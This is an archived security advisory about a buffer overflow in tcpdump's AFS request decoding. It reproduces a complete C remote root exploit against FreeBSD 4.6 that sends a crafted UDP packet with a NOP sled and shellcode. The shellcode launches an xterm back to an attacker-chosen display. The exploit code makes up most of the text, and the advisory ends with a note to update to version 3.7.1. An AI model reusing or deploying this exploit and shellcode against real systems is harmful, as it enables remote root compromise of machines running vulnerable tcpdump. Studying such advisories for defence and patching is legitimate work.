TUCoPS :: Unix :: General :: sb5373.htm

tcpdump buffer overflow
29th May 2002 [SBWID-5373]
COMMAND

	tcpdump buffer overflow

SYSTEMS AFFECTED

	3.6.2

PROBLEM

	As reported in SuSe  Security  Anouncement  SuSE-SA:2002:020,  a  buffer
	overflow exists in tcpdump, caused by a wrong handling of  AFS  requests
	decoding.
	
	 Update (24 December 2002)
	 ======
	
	From http://packetstorm.decepticons.org archives :
	
	 /* TCPDUMP 3.6.3 remote root exploit 
	    *
	    * tested against FreeBSD-4.6
	    *
	    * By: icesk 
	    *
	    * Greets: meenor, optik, scsiu, stanly
	    * flames: ezoons (homo)
	    */
	
	    #include <stdio.h>
	    #include <netinet/in.h>
	    #include <sys/types.h>
	    #include <sys/socket.h>
	    #include <netdb.h>
	    #include <arpa/inet.h>
	
	    #define ADDR                        0xbffff248
	    #define OFFSET                      0
	    #define NUM_ADDR                    10
	    #define NOP                         0x90
	    #define NUM_NOP                     100
	
	    #define RX_CLIENT_INITIATED     1
	    #define RX_PACKET_TYPE_DATA     1
	    #define FS_RX_DPORT             7000
	    #define FS_RX_SPORT             7001
	    #define AFS_CALL                134
	
	    struct rx_header {
	        u_int32_t epoch;
	        u_int32_t cid;
	        u_int32_t callNumber;
	        u_int32_t seq;
	        u_int32_t serial;
	        u_char type;
	        u_char flags;
	        u_char userStatus;
	        u_char securityIndex;
	        u_short spare;
	        u_short serviceId;
	    };
	
	    char shellcode[] = 
	      "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
	      "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
	      "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
	      "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
	      "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
	      "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
	      "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
	      "\xff\xff\xff"
	      "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";
	
	    long resolve(char *name) {
	     struct hostent *hp;
	     long ip;
	
	     if ((ip=inet_addr(name))==-1) {
	       if ((hp=gethostbyname(name))==NULL) {
	            fprintf (stderr,"Can't resolve host name [%s].\n",name);
	            exit(-1);
	          }
	        memcpy(&ip,(hp->h_addr),4);
	        }
	     return(ip);
	    }
	
	
	    int main (int argc, char *argv[]) {
	
	     struct sockaddr_in addr,sin;
	     int sock,aux, offset=OFFSET;
	     char buffer[4048], *chptr;
	     struct rx_header *rxh;
	     long int *lptr, return_addr=ADDR;
	
	
	      fprintf(stderr,"Tcpdump 3.6.3 remote exploit against FreeBSD 4.6\n\n");
	
	
	      if (argc<3) {
	        printf("Usage: %s [host] [display] [offset]\n",argv[0]);
	        exit(-1);
	        }
	
	      if (argc==4) offset=atoi(argv[3]);
	      return_addr+=offset;
	
	      fprintf(stderr,"Using return addr: %#x\n",return_addr);
	
	      addr.sin_family=AF_INET;
	      addr.sin_addr.s_addr=resolve(argv[1]);
	      addr.sin_port=htons(FS_RX_DPORT);
	
	      if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
	         perror("socket()");
	         exit(-1);
	         }
	
	      sin.sin_family=AF_INET;
	      sin.sin_addr.s_addr=INADDR_ANY;
	      sin.sin_port=htons(FS_RX_SPORT);
	
	      if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
	          perror("bind()");
	          exit(-1);
	          }
	
	      memset(buffer,0,sizeof(buffer));
	      rxh=(struct rx_header *)buffer;
	
	      rxh->type=RX_PACKET_TYPE_DATA;
	      rxh->seq=htonl(1);
	      rxh->flags=RX_CLIENT_INITIATED;
	
	      lptr=(long int *)(buffer+sizeof(struct rx_header));
	      *(lptr++)=htonl(AFS_CALL);
	      *(lptr++)=htonl(1);
	      *(lptr++)=htonl(2);
	      *(lptr++)=htonl(3);
	
	      *(lptr++)=htonl(420);
	      chptr=(char *)lptr;
	      sprintf(chptr,"1 0\n");
	      chptr+=4;
	
	      memset(chptr,'A',120);
	      chptr+=120;
	      lptr=(long int *)chptr;
	      for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
	      chptr=(char *)lptr;
	      memset(chptr,NOP,NUM_NOP);
	      chptr+=NUM_NOP;
	      shellcode[30]=(char)(46+strlen(argv[2]));
	      memcpy(chptr,shellcode,strlen(shellcode));
	      chptr+=strlen(shellcode);
	      memcpy(chptr,argv[2],strlen(argv[2]));
	      chptr+=strlen(argv[2]);
	
	      sprintf(chptr," 1\n");
	
	      if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
	         perror("send()");
	         exit(-1);
	         }
	
	      fprintf(stderr,"Packet Sent Waiting For Xterm!!!\n\n");
	
	      close(sock);
	      return(0);
	     }
	

SOLUTION

	Update your packages, or download last version - 3.7.1

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH